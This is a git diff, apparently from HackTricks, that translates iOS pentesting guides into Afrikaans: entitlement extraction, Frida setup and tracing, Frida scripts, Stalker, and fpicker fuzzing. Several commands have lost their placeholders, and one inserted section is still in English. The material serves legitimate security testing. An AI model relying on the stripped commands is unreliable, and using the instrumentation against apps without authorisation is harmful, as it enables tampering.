[**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Summary of the page [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary) +Opsomming van die bladsy [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#review-entitlements-embedded-in-the-compiled-app-binary) -### **Extracting Entitlements and Mobile Provision Files** +### **Uittreksel van Toekennings en Mobiele Voorsieningslêers** -When dealing with an app's IPA or an installed app on a jailbroken device, finding `.entitlements` files or the `embedded.mobileprovision` file directly may not be possible. However, entitlements property lists can still be extracted from the app binary, following the procedures outlined in the "iOS Basic Security Testing" chapter, particularly the "Acquiring the App Binary" section. +Wanneer jy te doen het met 'n app se IPA of 'n geïnstalleerde app op 'n jailbroken-toestel, mag dit nie moontlik wees om `.entitlements`-lêers of die `embedded.mobileprovision`-lêer direk te vind nie. Tog kan toekennings-eienskappe-lyste steeds uit die app-binêre lêer gehaal word deur die prosedures te volg wat in die hoofstuk "iOS Basiese Sekuriteitstoetsing" uiteengesit word, veral die afdeling "Die App-binêre bekom". -Even with encrypted binaries, certain steps can be employed to extract these files. Should these steps fail, tools such as Clutch (if compatible with the iOS version), frida-ios-dump, or similar utilities may be required to decrypt and extract the app. +Selfs met versleutelde binêre lêers kan sekere stappe gebruik word om hierdie lêers uit te trek. As hierdie stappe misluk, mag gereedskap soos Clutch (as dit versoenbaar is met die iOS-weergawe), frida-ios-dump, of soortgelyke hulpmiddels benodig word om die app te ontsluit en uit te trek. -#### **Extracting the Entitlements Plist from the App Binary** - -With the app binary accessible on a computer, **binwalk** can be utilized to extract all XML files. The command below demonstrates how to do so: +#### **Uittreksel van die Toekennings Plist uit die App-binêre** +Met die app-binêre lêer toeganklik op 'n rekenaar, kan **binwalk** gebruik word om alle XML-lêers uit te trek. Die onderstaande opdrag demonstreer hoe om dit te doen: ```bash $ binwalk -e -y=xml ./Telegram\ X @@ -35,40 +34,33 @@ DECIMAL HEXADECIMAL DESCRIPTION 1430180 0x15D2A4 XML document, version: "1.0" 1458814 0x16427E XML document, version: "1.0" ``` - -Alternatively, **radare2** can be used to quietly run a command and exit, searching for all strings in the app binary that contain "PropertyList": - +Alternatiewelik kan **radare2** gebruik word om stilweg 'n opdrag uit te voer en af te sluit, deur te soek na alle strings in die app binêre lêer wat "PropertyList" bevat: ```bash $ r2 -qc 'izz~PropertyList' ./Telegram\ X 0x0015d2a4 ascii ... 0x0016427d ascii H... ``` +Beide metodes, binwalk en radare2, maak die ekstraksie van `plist` lêers moontlik, met 'n inspeksie van die eerste een (0x0015d2a4) wat 'n suksesvolle herwinning van die [oorspronklike entitlements-lêer van Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements) onthul. -Both methods, binwalk and radare2, enable the extraction of `plist` files, with an inspection of the first one (0x0015d2a4) revealing a successful recovery of the [original entitlements file from Telegram](https://github.com/peter-iakovlev/Telegram-iOS/blob/77ee5c4dabdd6eb5f1e2ff76219edf7e18b45c00/Telegram-iOS/Telegram-iOS-AppStoreLLC.entitlements). - -For app binaries accessed on jailbroken devices (e.g., via SSH), the **grep** command with the `-a, --text` flag can be used to treat all files as ASCII text: - +Vir app-binêre lêers wat op jailbroken-toestelle toegang verkry (bv. via SSH), kan die **grep**-opdrag met die `-a, --text` vlag gebruik word om alle lêers as ASCII-teks te hanteer: ```bash $ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/... ``` +Die aanpassing van die `-A num, --after-context=num` vlag maak dit moontlik om meer of minder lyne te vertoon. Hierdie metode is selfs bruikbaar vir versleutelde app-binêre lêers en is geverifieer teen verskeie App Store-apps. Gereedskap wat vroeër genoem is, kan ook gebruik word op jailbroken iOS-toestelle vir soortgelyke doeleindes. -Adjusting the `-A num, --after-context=num` flag allows for the display of more or fewer lines. This method is viable even for encrypted app binaries and has been verified against multiple App Store apps. Tools mentioned earlier may also be employed on jailbroken iOS devices for similar purposes. - -**Note**: Direct use of the `strings` command is not recommended for this task due to its limitations in finding relevant information. Instead, employing grep with the `-a` flag on the binary or utilizing radare2 (`izz`)/rabin2 (`-zz`) is advisable for more effective results. +**Nota**: Direkte gebruik van die `strings`-opdrag word nie aanbeveel vir hierdie taak nie as gevolg van sy beperkings om relevante inligting te vind. Dit is raadsaam om in plaas daarvan grep met die `-a`-vlag op die binêre lêer te gebruik of radare2 (`izz`)/rabin2 (`-zz`) te gebruik vir meer doeltreffende resultate.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 0f3d07326..dbd52086e 100644 --- a/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -1,56 +1,93 @@ -# iOS Frida Configuration +# iOS Frida Konfigurasie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Installing Frida +## Frida-installasie -**Steps to install Frida on a Jailbroken device:** +**Stappe om Frida op 'n Jailbroken-toestel te installeer:** -1. Open Cydia/Sileo app. -2. Navigate to Manage -> Sources -> Edit -> Add. -3. Enter "https://build.frida.re" as the URL. -4. Go to the newly added Frida source. -5. Install the Frida package. +1. Maak die Cydia/Sileo-app oop. +2. Navigeer na Beheer -> Bronne -> Wysig -> Voeg by. +3. Voer "https://build.frida.re" as die URL in. +4. Gaan na die nuut bygevoegde Frida-bron. +5. Installeer die Frida-pakket. -If you are using **Corellium** you will need to download the Frida release from [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) and unpack and copy to the dylib location Frida asks for, e.g.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` +As jy **Corellium** gebruik, moet jy die Frida-vrystelling aflaai vanaf [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) en uitpak en kopieer na die dylib-plek waarvoor Frida vra, bv.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib` -After installed, you can use in your PC the command **`frida-ls-devices`** and check that the device appears (your PC needs to be able to access it).\ -Execute also **`frida-ps -Uia`** to check the running processes of the phone. +Nadat dit geïnstalleer is, kan jy die opdrag **`frida-ls-devices`** op jou rekenaar gebruik en kyk of die toestel verskyn (jou rekenaar moet toegang daartoe hê).\ +Voer ook **`frida-ps -Uia`** uit om die lopende prosesse van die telefoon te kontroleer. -## Frida without Jailbroken device & without patching the app +## Frida sonder 'n Jailbroken-toestel & sonder om die app te patch -Check this blog post about how to use Frida in non-jailbroken devices without patching the app: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07) +Kyk na hierdie blogpos oor hoe om Frida te gebruik in nie-jailbroken-toestelle sonder om die app te patch: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07) -## Frida Client Installation - -Install **frida tools**: +## Frida-kliëntinstallasie +Installeer **frida-gereedskap**: ```bash pip install frida-tools pip install frida ``` - -With the Frida server installed and the device running and connected, **check** if the client is **working**: - +Met die Frida-bediener geïnstalleer en die toestel wat loop en verbind is, **kontroleer** of die kliënt **werk**: ```bash frida-ls-devices # List devices frida-ps -Uia # Get running processes ``` +## Frida Spoor -## Frida Trace +Frida Trace is a powerful dynamic instrumentation tool that allows you to trace function calls and monitor the behavior of an iOS application in real-time. It can be used for various purposes, such as debugging, reverse engineering, and vulnerability analysis. +Frida Trace works by injecting a JavaScript code into the target application, which allows you to hook into specific functions and intercept their execution. This gives you the ability to log function arguments, return values, and even modify the behavior of the application on the fly. + +To configure Frida Trace in iOS, follow these steps: + +1. Install Frida on your iOS device by using the Frida CLI or FridaGadget. You can find detailed instructions on how to install Frida in the official documentation. + +2. Connect your iOS device to your computer using a USB cable. + +3. Launch the target application on your iOS device. + +4. Open a terminal window and navigate to the directory where you have installed Frida. + +5. Run the following command to start the Frida server on your iOS device: + + ``` + frida-server -l 0.0.0.0 + ``` + +6. On your computer, run the following command to list the processes running on your iOS device: + + ``` + frida-ps -U + ``` + + This will display a list of processes along with their process IDs (PIDs). + +7. Identify the process ID of the target application from the list. + +8. Run the following command to attach Frida to the target application: + + ``` + frida -U -l -p + ``` + + Replace `` with the path to your JavaScript code and `` with the process ID of the target application. + +9. Your JavaScript code will be executed in the context of the target application, allowing you to trace function calls and monitor its behavior. + +By using Frida Trace, you can gain valuable insights into the inner workings of an iOS application and identify potential vulnerabilities or security issues. It is a versatile tool that can greatly enhance your iOS pentesting capabilities. ```bash # Functions ## Trace all functions with the word "log" in their name @@ -68,14 +105,13 @@ frida-trace -U -m "*[NE* *authentication*]" ## To hook a plugin that is momentarely executed prepare Frida indicating the ID of the Plugin binary frida-trace -U -W -m '*[* *]' ``` +### Kry alle klasse en metodes -### Get all classes and methods - -* Auto complete: Just execute `frida -U ` +* Outomatiese voltooiing: Voer eenvoudig `frida -U ` uit
-* Get **all** available **classes** (filter by string) +* Kry **alle** beskikbare **klasse** (gefiltreer deur string) {% code title="/tmp/script.js" %} ```javascript @@ -84,20 +120,20 @@ frida-trace -U -W -m '*[* *]' var filterClass = "filterstring"; if (ObjC.available) { - for (var className in ObjC.classes) { - if (ObjC.classes.hasOwnProperty(className)) { - if (!filterClass || className.includes(filterClass)) { - console.log(className); - } - } - } +for (var className in ObjC.classes) { +if (ObjC.classes.hasOwnProperty(className)) { +if (!filterClass || className.includes(filterClass)) { +console.log(className); +} +} +} } else { - console.log("Objective-C runtime is not available."); +console.log("Objective-C runtime is not available."); } ``` {% endcode %} -* Get **all** **methods** of a **class** (filter by string) +* Kry **alle** **metodes** van 'n **klas** (gefilter deur string) {% code title="/tmp/script.js" %} ```javascript @@ -107,46 +143,45 @@ var specificClass = "YourClassName"; var filterMethod = "filtermethod"; if (ObjC.available) { - if (ObjC.classes.hasOwnProperty(specificClass)) { - var methods = ObjC.classes[specificClass].$ownMethods; - for (var i = 0; i < methods.length; i++) { - if (!filterMethod || methods[i].includes(filterClass)) { - console.log(specificClass + ': ' + methods[i]); - } - } - } else { - console.log("Class not found."); - } +if (ObjC.classes.hasOwnProperty(specificClass)) { +var methods = ObjC.classes[specificClass].$ownMethods; +for (var i = 0; i < methods.length; i++) { +if (!filterMethod || methods[i].includes(filterClass)) { +console.log(specificClass + ': ' + methods[i]); +} +} } else { - console.log("Objective-C runtime is not available."); +console.log("Class not found."); +} +} else { +console.log("Objective-C runtime is not available."); } ``` {% endcode %} -* **Call a function** - +* **Roep 'n funksie aan** ```javascript // Find the address of the function to call const func_addr = Module.findExportByName("", ""); // Declare the function to call const func = new NativeFunction( - func_addr, - "void", ["pointer", "pointer", "pointer"], { +func_addr, +"void", ["pointer", "pointer", "pointer"], { }); var arg0 = null; // In this case to call this function we need to intercept a call to it to copy arg0 Interceptor.attach(wg_log_addr, { - onEnter: function(args) { - arg0 = new NativePointer(args[0]); - } +onEnter: function(args) { +arg0 = new NativePointer(args[0]); +} }); -// Wait untill a call to the func occurs +// Wait untill a call to the func occurs while (! arg0) { - Thread.sleep(1); - console.log("waiting for ptr"); +Thread.sleep(1); +console.log("waiting for ptr"); } @@ -156,60 +191,56 @@ wg_log(arg0, arg1, txt); console.log("loaded"); ``` - ## Frida Fuzzing ### Frida Stalker -[From the docs](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Stalker is Frida’s code **tracing engine**. It allows threads to be **followed**, **capturing** every function, **every block**, even every instruction which is executed. +[Van die dokumentasie](https://frida.re/docs/stalker/#:~:text=Stalker%20is%20Frida's%20code%20tracing,every%20instruction%20which%20is%20executed.): Stalker is Frida se kode **naspeuringsenjin**. Dit maak dit moontlik om drade te **volg**, elke funksie **vas te vang**, elke blok, selfs elke instruksie wat uitgevoer word. -You have an example implementing Frida Stalker in [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) - -This is another example to attach Frida Stalker every time a function is called: +Jy het 'n voorbeeld wat Frida Stalker implementeer in [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) +Hier is nog 'n voorbeeld om Frida Stalker aan te heg elke keer as 'n funksie geroep word: ```javascript console.log("loading"); const wg_log_addr = Module.findExportByName("", ""); const wg_log = new NativeFunction( - wg_log_addr, - "void", ["pointer", "pointer", "pointer"], { +wg_log_addr, +"void", ["pointer", "pointer", "pointer"], { }); Interceptor.attach(wg_log_addr, { - onEnter: function(args) { - console.log(`logging the following message: ${args[2].readCString()}`); - - Stalker.follow({ - events: { - // only collect coverage for newly encountered blocks - compile: true, - }, - onReceive: function (events) { - const bbs = Stalker.parse(events, { - stringify: false, - annotate: false - }); - console.log("Stalker trace of write_msg_to_log: \n" + bbs.flat().map(DebugSymbol.fromAddress).join('\n')); - } - }); - }, - onLeave: function(retval) { - Stalker.unfollow(); - Stalker.flush(); // this is important to get all events - } +onEnter: function(args) { +console.log(`logging the following message: ${args[2].readCString()}`); + +Stalker.follow({ +events: { +// only collect coverage for newly encountered blocks +compile: true, +}, +onReceive: function (events) { +const bbs = Stalker.parse(events, { +stringify: false, +annotate: false +}); +console.log("Stalker trace of write_msg_to_log: \n" + bbs.flat().map(DebugSymbol.fromAddress).join('\n')); +} +}); +}, +onLeave: function(retval) { +Stalker.unfollow(); +Stalker.flush(); // this is important to get all events +} }); ``` - {% hint style="danger" %} -This is interesting from debugging purposes but for fuzzing, to be constantly **`.follow()`** and **`.unfollow()`** is very inefficient. +Dit is interessant vir doeleindes van foutopsporing, maar vir fuzzing is dit baie ondoeltreffend om voortdurend **`.follow()`** en **`.unfollow()`** te gebruik. {% endhint %} ## [Fpicker](https://github.com/ttdennis/fpicker) -[**fpicker**](https://github.com/ttdennis/fpicker) is a **Frida-based fuzzing suite** that offers a variety of fuzzing modes for in-process fuzzing, such as an AFL++ mode or a passive tracing mode. It should run on all platforms that are supported by Frida. - -* [**Install fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** +[**fpicker**](https://github.com/ttdennis/fpicker) is 'n **Frida-gebaseerde fuzzing suite** wat verskeie fuzzing modusse bied vir in-process fuzzing, soos 'n AFL++ modus of 'n passiewe spoorwegmodus. Dit behoort te werk op alle platforms wat deur Frida ondersteun word. +* [**Installeer fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** ```bash # Get fpicker git clone https://github.com/ttdennis/fpicker @@ -217,7 +248,7 @@ cd fpicker # Get Frida core devkit and prepare fpicker wget https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-[yourOS]-[yourarchitecture].tar.xz -# e.g. https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-macos-arm64.tar.xz +# e.g. https://github.com/frida/frida/releases/download/16.1.4/frida-core-devkit-16.1.4-macos-arm64.tar.xz tar -xf ./*tar.xz cp libfrida-core.a libfrida-core-[yourOS].a #libfrida-core-macos.a @@ -228,9 +259,7 @@ make fpicker-[yourOS] # fpicker-macos # Install radamsa (fuzzer generator) brew install radamsa ``` - -* **Prepare the FS:** - +* **Berei die FS voor:** ```bash # From inside fpicker clone mkdir -p examples/wg-log # Where the fuzzing script will be @@ -240,65 +269,64 @@ mkdir -p examples/wg-log/in # For starting inputs # Create at least 1 input for the fuzzer echo Hello World > examples/wg-log/in/0 ``` +* **Fuzzer-skrips** (`voorbeelde/wg-log/myfuzzer.js`): -* **Fuzzer script** (`examples/wg-log/myfuzzer.js`): - -{% code title="examples/wg-log/myfuzzer.js" %} +{% code title="voorbeelde/wg-log/myfuzzer.js" %} ```javascript // Import the fuzzer base class import { Fuzzer } from "../../harness/fuzzer.js"; class WGLogFuzzer extends Fuzzer { - constructor() { - console.log("WGLogFuzzer constructor called") +constructor() { +console.log("WGLogFuzzer constructor called") - // Get and declare the function we are going to fuzz - var wg_log_addr = Module.findExportByName("", ""); - var wg_log_func = new NativeFunction( - wg_log_addr, - "void", ["pointer", "pointer", "pointer"], { - }); +// Get and declare the function we are going to fuzz +var wg_log_addr = Module.findExportByName("", ""); +var wg_log_func = new NativeFunction( +wg_log_addr, +"void", ["pointer", "pointer", "pointer"], { +}); - // Initialize the object - super("", wg_log_addr, wg_log_func); - this.wg_log_addr = wg_log_addr; // We cannot use "this" before calling "super" - - console.log("WGLogFuzzer in the middle"); - - // Prepare the second argument to pass to the fuzz function - this.tag = Memory.allocUtf8String("arg2"); - - // Get the first argument we need to pass from a call to the functino we want to fuzz - var wg_log_global_ptr = null; - console.log(this.wg_log_addr); - Interceptor.attach(this.wg_log_addr, { - onEnter: function(args) { - console.log("Entering in the function to get the first argument"); - wg_log_global_ptr = new NativePointer(args[0]); - } - }); +// Initialize the object +super("", wg_log_addr, wg_log_func); +this.wg_log_addr = wg_log_addr; // We cannot use "this" before calling "super" - while (! wg_log_global_ptr) { - Thread.sleep(1) - } - this.wg_log_global_ptr = wg_log_global_ptr; - console.log("WGLogFuzzer prepare ended") - } +console.log("WGLogFuzzer in the middle"); + +// Prepare the second argument to pass to the fuzz function +this.tag = Memory.allocUtf8String("arg2"); + +// Get the first argument we need to pass from a call to the functino we want to fuzz +var wg_log_global_ptr = null; +console.log(this.wg_log_addr); +Interceptor.attach(this.wg_log_addr, { +onEnter: function(args) { +console.log("Entering in the function to get the first argument"); +wg_log_global_ptr = new NativePointer(args[0]); +} +}); + +while (! wg_log_global_ptr) { +Thread.sleep(1) +} +this.wg_log_global_ptr = wg_log_global_ptr; +console.log("WGLogFuzzer prepare ended") +} - // This function is called by the fuzzer with the first argument being a pointer into memory - // where the payload is stored and the second the length of the input. - fuzz(payload, len) { - // Get a pointer to payload being a valid C string (with a null byte at the end) - var payload_cstring = payload.readCString(len); - this.payload = Memory.allocUtf8String(payload_cstring); +// This function is called by the fuzzer with the first argument being a pointer into memory +// where the payload is stored and the second the length of the input. +fuzz(payload, len) { +// Get a pointer to payload being a valid C string (with a null byte at the end) +var payload_cstring = payload.readCString(len); +this.payload = Memory.allocUtf8String(payload_cstring); - // Debug and fuzz - this.debug_log(this.payload, len); - // Pass the 2 first arguments we know the function needs and finally the payload to fuzz - this.target_function(this.wg_log_global_ptr, this.tag, this.payload); - } +// Debug and fuzz +this.debug_log(this.payload, len); +// Pass the 2 first arguments we know the function needs and finally the payload to fuzz +this.target_function(this.wg_log_global_ptr, this.tag, this.payload); +} } const f = new WGLogFuzzer(); @@ -306,15 +334,13 @@ rpc.exports.fuzzer = f; ``` {% endcode %} -* **Compile** the fuzzer: - +* **Kompileer** die fuzzer: ```bash # From inside fpicker clone ## Compile from "myfuzzer.js" to "harness.js" frida-compile examples/wg-log/myfuzzer.js -o harness.js ``` - -* Call fuzzer **`fpicker`** using **`radamsa`**: +* Roep die fuzzer **`fpicker`** aan met behulp van **`radamsa`**: {% code overflow="wrap" %} ```bash @@ -325,67 +351,65 @@ fpicker -v --fuzzer-mode active -e attach -p -D usb -o example {% endcode %} {% hint style="danger" %} -In this case we **aren't restarting the app or restoring the state** after each payload. So, if Frida finds a **crash** the **next inputs** after that payload might also **crash the app** (because the app is in a unstable state) even if the **input shouldn't crash** the app. +In hierdie geval **herlaai ons die app nie of herstel die toestand nie** na elke lading. So, as Frida 'n **crash** vind, kan die **volgende insette** na daardie lading ook die app **crash** (omdat die app in 'n onstabiele toestand is), selfs al **moet die inset nie die app laat crash nie. -Moreover, Frida will hook into exception signals of iOS, so when **Frida finds a crash**, probably an **iOS crash reports won't be generated**. +Verder sal Frida in die uitsonderingseine van iOS inklink, so wanneer **Frida 'n crash vind**, sal daar waarskynlik nie 'n **iOS crash-rapport gegenereer word nie. -To prevent this, for example, we could restart the app after each Frida crash. +Om dit te voorkom, kan ons byvoorbeeld die app herlaai na elke Frida-crash. {% endhint %} -### Logs & Crashes +### Logboeke & Crashes -You can check the **macOS console** or the **`log`** cli to check macOS logs.\ -You can check also the logs from iOS using **`idevicesyslog`**.\ -Some logs will omit information adding **``**. To show all the info you need to install some profile from [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) to enable that private info. - -If you don't know what to do: +Jy kan die **macOS-konsole** of die **`log`**-opdrag gebruik om macOS-logboeke te kontroleer.\ +Jy kan ook die logboeke van iOS kontroleer deur **`idevicesyslog`** te gebruik.\ +Sommige logboeke sal inligting uitsluit deur **``** by te voeg. Om al die inligting te wys, moet jy 'n profiel installeer vanaf [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) om daardie private inligting in te skakel. +As jy nie weet wat om te doen nie: ```sh vim /Library/Preferences/Logging/com.apple.system.logging.plist - Enable-Private-Data - +Enable-Private-Data + killall -9 logd ``` - -You can check the crashes in: +Jy kan die crashes in die volgende plekke nagaan: * **iOS** - * Settings → Privacy → Analytics & Improvements → Analytics Data - * `/private/var/mobile/Library/Logs/CrashReporter/` +* Instellings → Privaatheid → Analitika & Verbeterings → Analitika Data +* `/private/var/mobile/Library/Logs/CrashReporter/` * **macOS**: - * `/Library/Logs/DiagnosticReports/` - * `~/Library/Logs/DiagnosticReports` +* `/Library/Logs/DiagnosticReports/` +* `~/Library/Logs/DiagnosticReports` {% hint style="warning" %} -iOS only stores 25 crashes of the same app, so you need to clean that or iOS will stop creating crashes. +iOS stoor slegs 25 crashes van dieselfde app, so jy moet dit skoonmaak of iOS sal ophou om crashes te skep. {% endhint %} -## Frida Android Tutorials +## Frida Android Tutoriale {% content-ref url="../android-app-pentesting/frida-tutorial/" %} [frida-tutorial](../android-app-pentesting/frida-tutorial/) {% endcontent-ref %} -## References +## Verwysings * [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/mobile-pentesting/ios-pentesting/ios-app-extensions.md b/mobile-pentesting/ios-pentesting/ios-app-extensions.md index c4bee3166..3afbfce99 100644 --- a/mobile-pentesting/ios-pentesting/ios-app-extensions.md +++ b/mobile-pentesting/ios-pentesting/ios-app-extensions.md @@ -1,77 +1,77 @@ -# iOS App Extensions +# iOS App-uitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* 